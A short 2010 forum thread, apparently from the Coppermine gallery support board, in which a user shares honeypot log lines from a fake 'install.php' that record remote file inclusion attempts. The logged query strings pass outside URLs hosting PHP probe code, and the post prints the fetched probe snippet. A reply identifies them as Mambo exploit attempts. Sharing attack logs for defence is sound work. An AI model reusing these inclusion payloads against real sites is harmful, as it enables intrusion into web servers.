Print

[brix]

Hi all,

I know that after installation you must delete "install.php" for any CMS but often that does not happen.

One of our users (an Italian website) has recently been attacks on the file "install.php" so I suggested to remove it.

He did and one of his staff created a false "install.php" bait running log of attempts to hack.

I hope it will be useful to know which attack is executed, and for that reason I Paste the contents of the log created bait:

Log:

Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

Comment:

Caught!
It seems that finally the fish has the bait!
On the day of August there were a couple of intrusion attempts, the result is these two lines:
Sunday 15th of August 2010 9:09:59 AM - 146.83.237.120 - Mozilla/5.0 - http://www.songdosarang.org/skin/head mosConfig_absolute_path =?
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error = http://devilbat.fileave.com/zfxid1.txt?

The first IP is from Chile, the university network and the second by a U.S. hosting service, probably in both cases it is a botnet and the owners of IP are unaware and innocent.

Both attacks link to a URL in the parameters passed to the installer of Coppermine by visiting the url you get (as expected) the string php who wanted to inject this site:
<? Php / * * ZFxID / echo ("Shiro". "Hige") die ("Shiro". "Hige") / * * ZFxID /?>

If this thread is somewhat useful, I was pleased to collaborate in the protection of Coppermine, with the help of our users. Thanks

[brix]

sorry I pushed the button "solved" but is not :-(

[Nibbler]

That's a mambo exploit attempt. It won't do anything to Coppermine.